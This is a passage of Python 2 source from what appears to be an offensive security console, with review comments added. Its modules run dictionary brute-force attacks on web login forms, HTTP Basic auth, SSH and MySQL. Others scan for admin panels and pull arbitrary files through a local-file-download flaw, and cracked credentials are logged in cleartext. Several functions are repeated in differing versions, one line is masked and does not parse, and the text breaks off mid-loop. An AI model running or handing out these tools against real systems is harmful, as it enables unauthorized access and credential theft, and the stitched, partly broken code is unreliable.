            # NOTE(review): the change is reported under the label "dict_1".
            d.change("dict_1",defaultdic2)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set para_1":
            defaultdat1 = actions[11:]
            d.change("para_1",defaultdat1)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set para_2":
            defaultdat2 = actions[11:]
            d.change("para_2",defaultdat2)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set method":
            defaultmeth = actions[11:]
            d.change("method",defaultmeth)
            httpformbasebruteforce(0)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
            # Unreachable duplicate kept from the original.
            return
        elif actions=="run" or actions=="r":
            d.run()
            try:
                ping.live(defaulthost,defaultport)
                if True:
                    try:
                        d.loading()
                        try:
                            with open(defaultdic1,'r') as user:
                                for us in user:
                                    try:
                                        # The password file is reopened for
                                        # every user line.
                                        with open(defaultdic2,'r') as passs:
                                            for ps in passs:
                                                us=us.replace("\n","")
                                                ps=ps.replace("\n","")
                                                params = urllib.urlencode({defaultdat1: us, defaultdat2: ps})
                                                header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
                                                # A new connection per attempt;
                                                # none is closed explicitly.
                                                conn = httplib.HTTPConnection(defaulthost,defaultport)
                                                conn.request(defaultmeth, defaultpach, params, header)
                                                response = conn.getresponse()
                                                ver_source = response.read()
                                                # find() returns -1 when the marker
                                                # is absent, so this is true for any
                                                # body not starting with the marker.
                                                if ver_source.find(defaultcont) != 0:
                                                    # NOTE(review): the credential
                                                    # pair is appended to this log
                                                    # file in cleartext.
                                                    log=open('core/logs/logsBruteForce.log','a')
                                                    log.write('\n ===================================== ')
                                                    log.write('\n Module : BruteForceFormBase')
                                                    log.write('\n Data : '+time.strftime('%c'))
                                                    log.write('\n target : '+defaulthost)
                                                    log.write('\n path : '+defaultpach)
                                                    log.write('\n method : '+defaultmeth)
                                                    log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')')
                                                    log.close()
                                                    print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n"
                                                    httpformbasebruteforce(0)
                                                else:
                                                    print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")"
                                    except:
                                        # Bare except: any error inside the inner
                                        # loop is reported against dict_2.
                                        d.filenot(defaultdic2)
                                        httpformbasebruteforce(0)
                        except:
                            d.filenot(defaultdic1)
                            httpformbasebruteforce(0)
                    except:
                        d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    httpformbasebruteforce(0)
def httpbt(run):
    """Prompt handler for the web/httpbt module (HTTP Basic, fixed user).

    Reads one command unless ``run`` is 1.  ``run`` opens one TCP connection
    and sends a GET with an ``Authorization: Basic`` header for every line of
    the password dictionary.  The function calls itself at the end of every
    path except ``back``.
    """
    try:
        global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2
        if run != 1:
            actions = raw_input(d.prompt("web/httpbt"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("patch", "yes", "Folder or dir", defaultpach)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            # The scheme is stripped from the previous value, not the new one.
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions[0:9] == "set patch":
            defaultpach = ping.update(defaultpach, actions, "patch")
            d.change("patch", defaultpach)
        elif actions[0:8] == "set user":
            defaultuser = ping.update(defaultuser, actions, "user")
            d.change("user", defaultuser)
        elif actions[0:10] == "set dict_1":
            defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
            d.change("dict_1", defaultdic2)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            # SystemExit raised here is seen by the outer bare except first.
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                if True:
                    # One socket is reused for every request below.
                    red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    red.connect((defaulthost, int(defaultport)))
                    try:
                        d.loading_file()
                        try:
                            with open(defaultdic2, "r") as passs:
                                for ps in passs:
                                    ps = ps.replace("\n", "")
                                    red.send("GET " + defaultpach + " HTTP/1.1\r\n")
                                    red.send("HOST: " + defaulthost + "\r\n")
                                    red.send(
                                        "Authorization:Basic " + base64.b64encode(defaultuser + ":" + ps) + "\r\n\r\n"
                                    )
                                    # At most 1000 bytes of the reply are read.
                                    last = red.recv(1000)
                                    # find() is -1 when "401" is absent and 0 when
                                    # it is at offset 0; both take this branch.
                                    if last.find("401") <= 0:
                                        # The helper receives the credential pair;
                                        # what it stores is not visible here.
                                        ping.savethree(
                                            "BruteForceHTTP", defaulthost, defaultport, defaultpach, defaultuser, ps
                                        )
                                        d.Success(defaultuser, ps)
                                        # NOTE(review): attribute reference only;
                                        # the socket is not closed by this line.
                                        red.close
                                        httpbt(0)
                                    else:
                                        # NOTE(review): the operands between the
                                        # string pieces are masked ("******") in
                                        # this listing; the line does not parse
                                        # as shown.
                                        print " " + Alr + " Checking (username="******")(password="******")"
                                        # NOTE(review): no call; nothing is closed.
                                        red.close
                        except:
                            Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    httpbt(0)
def btssh(run):
    """Prompt handler for the bt/ssh module.

    Reads one command unless ``run`` is 1.  ``run`` attempts a ``pxssh`` login
    for the stored user with every line of the password dictionary and
    returns 1 on the first login that does not raise.  Other paths return
    None after calling ``btssh(0)`` again; ``back`` returns without doing so.
    """
    try:
        global defaulthost, defaultport, defaultuser, defaultdicc
        if run != 1:
            actions = raw_input(d.prompt("bt/ssh"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
            print ""
            btssh(0)
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target", defaulthost)
            btssh(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port", defaultport)
            btssh(0)
        elif actions[0:8] == "set user":
            defaultuser = actions[9:]
            d.change("user", defaultuser)
            btssh(0)
        elif actions[0:10] == "set dict_1":
            defaultdicc = actions[11:]
            d.change("dict_1", defaultdicc)
            btssh(0)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
            # Unreachable duplicate kept from the original.
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                # defaultport is used for this check only; the login call
                # below does not receive it.
                ping.live(defaulthost, defaultport)
                if True:
                    try:
                        d.loading()
                        try:
                            with open(defaultdicc, "r") as passs:
                                for ps in passs:
                                    ps = ps.replace("\n", "")
                                    try:
                                        # A new pxssh object per attempt.
                                        connect = pxssh.pxssh()
                                        connect.login(defaulthost, defaultuser, ps)
                                        if True:
                                            # The helper receives the credential
                                            # pair; what it stores is not visible
                                            # here.
                                            ping.save("BruteForceSSH", defaulthost, defaultport, defaultuser, ps)
                                            print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n"
                                            return 1
                                    except:
                                        # Bare except: every exception from the
                                        # login, including an interrupt, is
                                        # shown as one more attempt.
                                        print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
                        except:
                            d.filenot(defaultdicc)
                            # NOTE(review): this enters btpop3, not btssh;
                            # btpop3 is not defined in this listing.
                            btpop3(0)
                    except:
                        d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    btssh(0)
def LFDconsole(run):
    """Prompt handler for the web/lfd-con module.

    Reads one command unless ``run`` is 1.  ``run`` requests the configured
    path; on HTTP 200 it opens an inner ``get <name>`` console that fetches
    ``http://<target><path>?<name>``, writes the body under ``tmp/``, prints it
    with ``cat`` and removes it.  The function calls itself at the end of
    every path except ``back``.
    """
    global defaulthost,defaultfile,defaultport
    try:
        if run!=1:
            actions=raw_input(d.prompt("web/lfd-con"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP, DNS Target",defaulthost)
            d.descrip("patch","yes","Path file vul",defaultfile)
            d.descrip("port","no","Port service",defaultport)
            d.space()
            LFDconsole(0)
        elif actions[0:9] == "set patch":
            defaultfile=ping.update(defaultfile,actions,"patch")
            d.change("patch",defaultfile)
        elif actions[0:10] == "set target":
            defaulthost=ping.update(defaulthost,actions,"target")
            d.change("target",defaulthost)
        elif actions[0:8] == "set port":
            defaultport=ping.update(defaultport,actions,"port")
            d.change("port",defaultport)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
        elif actions=="run" or actions=="r":
            d.run()
            try:
                ping.live(defaulthost,defaultport)
                if True:
                    connection = httplib.HTTPConnection(defaulthost,defaultport)
                    connection.request("GET",defaultfile)
                    response = connection.getresponse()
                    if response.status == 200:
                        print " "+Suf+" File response correctly."
                        d.space()
                        print "\n "+Hlp+" LFD Console help\n"
                        print " ------------------------------------------"
                        print " |"+colors[6]+"Command "+colors[0]+"| "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |"
                        print " ------------------------------------------"
                        print " | get | Download file | get index.php |"
                        print " ------------------------------------------"
                        d.space()
                        command=0
                        while command!="exit":
                            command=raw_input(d.Client_prompt("LFD"))
                            if command[:3] == "get":
                                submit=command[4:]
                                try:
                                    # The URL omits the port, so this request
                                    # goes to the default HTTP port.
                                    url = "http://"+defaulthost+defaultfile+"?"+submit
                                    # Text after the last "/" of the whole URL.
                                    file_name = url.split('/')[-1]
                                    u = urllib2.urlopen(url)
                                    # NOTE(review): f is closed only on the
                                    # non-empty success path below.
                                    f = open("tmp/"+file_name, 'wb')
                                    meta = u.info()
                                    try:
                                        file_size = int(meta.getheaders("Content-Length")[0])
                                        if file_size != 0:
                                            print " "+Alr+" Downloading %s Bytes: %s" % (file_name, file_size)
                                            file_size_dl = 0
                                            block_sz = 8192
                                            while True:
                                                buffer = u.read(block_sz)
                                                if not buffer:
                                                    break
                                                file_size_dl += len(buffer)
                                                f.write(buffer)
                                                status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
                                                # Backspaces so a later print
                                                # overwrites the progress text.
                                                status = status + chr(8)*(len(status)+1)
                                            print " "+Suf+" Completed "+status
                                            f.close()
                                            print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n"
                                            # NOTE(review): file_name comes from
                                            # operator input and is placed inside
                                            # single quotes in a shell command; a
                                            # quote in it ends the quoting on the
                                            # operator's host.
                                            os.system("cat 'tmp/"+file_name+"' -b -v ")
                                            os.system("rm 'tmp/"+file_name+"'")
                                            print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n"
                                        else:
                                            print " "+War+" File empy or no exist."
                                    except:
                                        Errors.Errors(event=sys.exc_info(), info=url)
                                except:
                                    Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport)
                    else:
                        print " "+Bad+" File Not response correctly."
                        d.space()
            except:
                Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info(), info=False)
    LFDconsole(0)
def adminfinder(run):
    """Command loop for the ``web/cpfinder`` module.

    ``run`` equal to 1 triggers the "run" action directly; any other value
    reads one command from the operator. The function re-enters itself after
    each command ("back" returns to the caller).

    "run" requests every line of the ``defaultdicc`` word list as a path on
    the target and records the ones answered with status 200 or 301 in
    ``core/logs/logsAdminFinder.log``.
    """
    global defaulthost,defaultport,defaultdicc
    try:
        choice = "run" if run == 1 else raw_input(d.prompt("web/cpfinder"))
        if choice in ("show options", "sop"):
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            print ""
        elif choice.startswith("set target"):
            defaulthost = choice[11:].replace("http://", "")
            d.change("target",defaulthost)
            adminfinder(0)
        elif choice.startswith("set port"):
            defaultport = choice[9:]
            d.change("port",defaultport)
            adminfinder(0)
        elif choice in ("exit", "x"):
            d.goodbye()
            exit()
        elif choice in ("help", "h"):
            help.help()
        elif choice in ("back", "b"):
            return
        elif choice in ("run", "r"):
            d.run()
            try:
                # Result of ping.live is ignored; presumably it raises when the
                # target does not answer -- TODO confirm.
                ping.live(defaulthost,defaultport)
                try:
                    with open(defaultdicc,'r') as wordlist:
                        results=""
                        resultn=""
                        for entry in wordlist:
                            path = "/" + entry.replace("\n","")
                            # NOTE(review): one connection per entry, never closed.
                            conn = httplib.HTTPConnection(defaulthost,defaultport)
                            conn.request("GET",path)
                            reply = conn.getresponse()
                            if reply.status in (200, 301):
                                print " ["+colors[2]+"+"+colors[0]+"] Response "+path
                                results="-["+colors[2]+"*"+colors[0]+"]"+path+"\n"+results
                                resultn=path+","+resultn
                            else:
                                print " ["+colors[4]+"!"+colors[0]+"] Checking..."+colors[0]+path
                        if results:
                            print "\n"+results
                            logfile=open('core/logs/logsAdminFinder.log','a')
                            logfile.write('\n ===================================== ')
                            logfile.write('\n Module : Admin Finder')
                            logfile.write('\n Data : '+time.strftime('%c'))
                            logfile.write('\n target : '+defaulthost)
                            logfile.write('\n port : '+defaultport)
                            logfile.write('\n found : '+resultn)
                            logfile.close()
                        else:
                            print "\n ["+colors[1]+"-"+colors[0]+"] Not Found CP\n"
                except:
                    # Bare except: a missing word list, a network error and
                    # Ctrl-C all end up here.
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    adminfinder(0)
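def adminfinder(run):
    """Command loop for the ``web/cpfinder`` module.

    ``run`` equal to 1 triggers the "run" action directly; any other value
    reads one command from the operator. The function re-enters itself after
    each command ("back" returns to the caller).

    "run" requests every line of the ``defaultdicc`` word list as a path on
    the target and passes the paths answered with 200 or 301 to
    ``ping.savefive``.
    """
    global defaulthost, defaultport, defaultdicc
    try:
        if run != 1:
            actions = raw_input(d.prompt("web/cpfinder"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("table", "no", "Dictionary", defaultdicc)
            d.space()
        elif actions[0:10] == "set target":
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions[0:9] == "set table":
            # Fixed: the current dictionary path is passed, not the port, in
            # line with the other setters of this function.
            defaultdicc = ping.update(defaultdicc, actions, "table")
            d.change("table", defaultdicc)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                # Result of ping.live is ignored; presumably it raises when the
                # target does not answer -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading_file()
                    with open(defaultdicc, 'r') as dirt:
                        results = ""
                        for patch in dirt:
                            patch = "/" + patch.replace("\n", "")
                            connection = httplib.HTTPConnection(defaulthost, defaultport)
                            connection.request("GET", patch)
                            response = connection.getresponse()
                            if response.status == 200 or response.status == 301:
                                print " " + Suf + " Response " + patch
                                results = "-" + Suf + " " + patch + "\n" + results
                            else:
                                print " " + Alr + " Checking..." + colors[0] + patch
                        if results != "":
                            print "\n" + results
                            ping.savefive("Admin Finder", defaulthost, defaultport, results)
                        else:
                            print "\n " + Nrs + " Not Results :(.\n"
                except:
                    # Bare except: file and network failures are both reported
                    # against the dictionary path.
                    Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    adminfinder(0)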
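def adminfinder(run):
    """Command loop for the ``web/cpfinder`` module.

    With ``run`` set to 1 the "run" action starts at once; otherwise a
    command is read from the operator. After handling it the function calls
    itself again, except for "back", which returns.

    "run" walks the ``defaultdicc`` word list, requests each entry as a path
    on the target and hands the paths answered with 200 or 301 to
    ``ping.savefive``.
    """
    global defaulthost, defaultport, defaultdicc
    try:
        if run != 1:
            actions = raw_input(d.prompt("web/cpfinder"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("table", "no", "Ditionary", defaultdicc)
            d.space()
        elif actions[0:10] == "set target":
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions[0:9] == "set table":
            # Fixed: ping.update used to receive defaultport here; every other
            # setter passes the value it is about to replace.
            defaultdicc = ping.update(defaultdicc, actions, "table")
            d.change("table", defaultdicc)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                # ping.live's return value is unused; presumably it raises on
                # an unreachable target -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading_file()
                    with open(defaultdicc, "r") as dirt:
                        results = ""
                        for patch in dirt:
                            patch = patch.replace("\n", "")
                            patch = "/" + patch
                            connection = httplib.HTTPConnection(defaulthost, defaultport)
                            connection.request("GET", patch)
                            response = connection.getresponse()
                            if response.status in (200, 301):
                                print " " + Suf + " Response " + patch
                                results = "-" + Suf + " " + patch + "\n" + results
                            else:
                                print " " + Alr + " Checking..." + colors[0] + patch
                        if results != "":
                            print "\n" + results
                            ping.savefive("Admin Finder", defaulthost, defaultport, results)
                        else:
                            print "\n " + Nrs + " Not Results :(.\n"
                except:
                    # Any failure in the scan, not only a missing file, is
                    # reported with the dictionary path.
                    Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    adminfinder(0)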
def btsql(run):
    """Command loop for the ``bt/sql`` module.

    ``run`` equal to 1 starts the "run" action directly; otherwise one
    command is read from the operator. The function calls itself again after
    each command; "back" returns, and a successful login returns 1.

    "run" tries each line of ``defaultdicc`` as the password for
    ``defaultuser`` through ``MySQLdb.connect`` and stops at the first
    connection that does not raise.
    """
    global defaulthost, defaultport, defaultuser, defaultdicc
    try:
        command = "run" if run == 1 else raw_input(d.prompt("bt/sql"))
        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
            d.space()
            btsql(0)
        elif command.startswith("set target"):
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, command, "target")
            d.change("target", defaulthost)
        elif command.startswith("set port"):
            defaultport = ping.update(defaultport, command, "port")
            d.change("port", defaultport)
        elif command.startswith("set user"):
            defaultuser = ping.update(defaultuser, command, "user")
            d.change("user", defaultuser)
        elif command.startswith("set dict_1"):
            defaultdicc = ping.update(defaultdicc, command, "dict_1")
            d.change("dict_1", defaultdicc)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                # ping.live's result is not inspected; presumably it raises
                # when the service is down -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading_file()
                    try:
                        with open(defaultdicc, 'r') as wordlist:
                            for line in wordlist:
                                guess = line.replace("\n", "")
                                try:
                                    # NOTE(review): defaultport is not passed
                                    # to connect(), and the connection object
                                    # is discarded without being closed.
                                    MySQLdb.connect(defaulthost, defaultuser, guess, '')
                                    ping.save("BruteForceSQL", defaulthost, defaultport, defaultuser, guess)
                                    d.Success(defaultuser, guess)
                                    return 1
                                except:
                                    # Bare except: network errors are reported
                                    # the same way as a rejected password.
                                    print " " + Alr + " Checking (" + defaultuser + "=" + guess + ")"
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
                except:
                    Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    btsql(0)
def btsql(run):
    """Command loop for the ``bt/sql`` module.

    A ``run`` value of 1 goes straight to the "run" action; any other value
    prompts the operator for a command. Every command except "back" ends with
    the function calling itself again; a successful login returns 1.

    "run" reads ``defaultdicc`` line by line and passes each line as the
    password for ``defaultuser`` to ``MySQLdb.connect``.
    """
    global defaulthost,defaultport,defaultuser,defaultdicc
    try:
        if run == 1:
            entered = "run"
        else:
            entered = raw_input(d.prompt("bt/sql"))
        if entered in ("show options", "sop"):
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            d.descrip("user","yes","Username",defaultuser)
            d.descrip("dict_1","yes","Dictionary pass",defaultdicc)
            d.space()
            btsql(0)
        elif entered.startswith("set target"):
            defaulthost=defaulthost.replace("http://", "")
            defaulthost=ping.update(defaulthost,entered,"target")
            d.change("target",defaulthost)
        elif entered.startswith("set port"):
            defaultport=ping.update(defaultport,entered,"port")
            d.change("port",defaultport)
        elif entered.startswith("set user"):
            defaultuser=ping.update(defaultuser,entered,"user")
            d.change("user",defaultuser)
        elif entered.startswith("set dict_1"):
            defaultdicc=ping.update(defaultdicc,entered,"dict_1")
            d.change("dict_1",defaultdicc)
        elif entered in ("exit", "x"):
            d.goodbye()
            exit()
        elif entered in ("help", "h"):
            help.help()
        elif entered in ("back", "b"):
            return
        elif entered in ("run", "r"):
            d.run()
            try:
                # The value returned by ping.live is unused; presumably the
                # call raises on failure -- TODO confirm.
                ping.live(defaulthost,defaultport)
                try:
                    d.loading_file()
                    try:
                        with open(defaultdicc,'r') as candidates:
                            for raw in candidates:
                                secret=raw.replace("\n","")
                                try:
                                    # NOTE(review): the returned connection is
                                    # neither kept nor closed.
                                    MySQLdb.connect(defaulthost,defaultuser,secret,'')
                                    ping.save("BruteForceSQL",defaulthost,defaultport,defaultuser,secret)
                                    d.Success(defaultuser,secret)
                                    return 1
                                except:
                                    # Every exception counts as a failed try.
                                    print " "+Alr+" Checking ("+defaultuser+"="+secret+")"
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
                except:
                    Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    btsql(0)
def httpformbasebruteforce(run):
    """Command loop for the ``web/formbt`` module.

    ``run`` equal to 1 starts the "run" action; otherwise one command is read
    from the operator. The function calls itself again after each command,
    except "back", which returns.

    "run" submits the form at ``defaultpach`` once per line of
    ``defaultdic2``, sending ``defaultuser`` under the field ``defaultdat1``
    and the line under ``defaultdat2``, and compares the response body with
    the ``defaultcont`` marker.
    """
    global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/formbt"))
        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("patch", "yes", "Folder or dir", defaultpach)
            d.descrip("para_1", "yes", "Parameter 1", defaultdat1)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("para_2", "yes", "Parameter 2", defaultdat2)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
            d.descrip("method", "yes", "POST or GET", defaultmeth)
            d.descrip("condit", "yes", "[if!=]No Logged", defaultcont)
            print ""
        elif command.startswith("set target"):
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, command, "target")
            d.change("target", defaulthost)
        elif command.startswith("set port"):
            defaultport = ping.update(defaultport, command, "port")
            d.change("port", defaultport)
        elif command.startswith("set patch"):
            defaultpach = ping.update(defaultpach, command, "patch")
            d.change("patch", defaultpach)
        elif command.startswith("set condit"):
            defaultcont = ping.update(defaultcont, command, "condit")
            d.change("condit", defaultcont)
        elif command.startswith("set user"):
            defaultuser = ping.update(defaultuser, command, "user")
            d.change("user", defaultuser)
        elif command.startswith("set dict_1"):
            defaultdic2 = ping.update(defaultdic2, command, "dict_1")
            d.change("dict_1", defaultdic2)
        elif command.startswith("set para_1"):
            defaultdat1 = ping.update(defaultdat1, command, "para_1")
            d.change("para_1", defaultdat1)
        elif command.startswith("set para_2"):
            defaultdat2 = ping.update(defaultdat2, command, "para_2")
            d.change("para_2", defaultdat2)
        elif command.startswith("set method"):
            defaultmeth = ping.update(defaultmeth, command, "method")
            d.change("method", defaultmeth)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                # ping.live's result is ignored; presumably it raises when the
                # target is unreachable -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading_file()
                    try:
                        with open(defaultdic2, "r") as wordlist:
                            for line in wordlist:
                                guess = line.replace("\n", "")
                                body = urllib.urlencode({defaultdat1: defaultuser, defaultdat2: guess})
                                headers = {
                                    "Content-type": "application/x-www-form-urlencoded",
                                    "Accept": "text/plain",
                                }
                                conn = httplib.HTTPConnection(defaulthost, defaultport)
                                conn.request(defaultmeth, defaultpach, body, headers)
                                page = conn.getresponse().read()
                                # NOTE(review): str.find returns 0 when the
                                # marker sits at the very start of the body, so
                                # that case is also taken as "marker absent".
                                if page.find(defaultcont) <= 0:
                                    ping.savefour(
                                        "BruteForceFormBase",
                                        defaulthost,
                                        defaultport,
                                        defaultpach,
                                        defaultmeth,
                                        defaultdat1,
                                        defaultdat2,
                                        defaultuser,
                                        guess,
                                    )
                                    print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + guess + "]\n"
                                    # The prompt is re-entered here; the loop
                                    # resumes once that call returns.
                                    httpformbasebruteforce(0)
                                else:
                                    print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + guess + ")"
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
                except:
                    Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    httpformbasebruteforce(0)
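def btssh(run):
    """Command loop for the ``bt/ssh`` module.

    ``run`` equal to 1 starts the "run" action; otherwise one command is read
    from the operator. The function calls itself again after each command;
    "back" returns and a successful login returns 1.

    "run" tries each line of ``defaultdicc`` as the password for
    ``defaultuser`` through ``pxssh`` and stops at the first login that does
    not raise.
    """
    global defaulthost, defaultport, defaultuser, defaultdicc
    try:
        if run != 1:
            actions = raw_input(d.prompt("bt/ssh"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
            print ""
            btssh(0)
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target", defaulthost)
            btssh(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port", defaultport)
            btssh(0)
        elif actions[0:8] == "set user":
            defaultuser = actions[9:]
            d.change("user", defaultuser)
            btssh(0)
        elif actions[0:10] == "set dict_1":
            defaultdicc = actions[11:]
            d.change("dict_1", defaultdicc)
            btssh(0)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                # ping.live's result is ignored; presumably it raises when the
                # target is unreachable -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading()
                    try:
                        with open(defaultdicc, 'r') as passs:
                            for ps in passs:
                                ps = ps.replace("\n", "")
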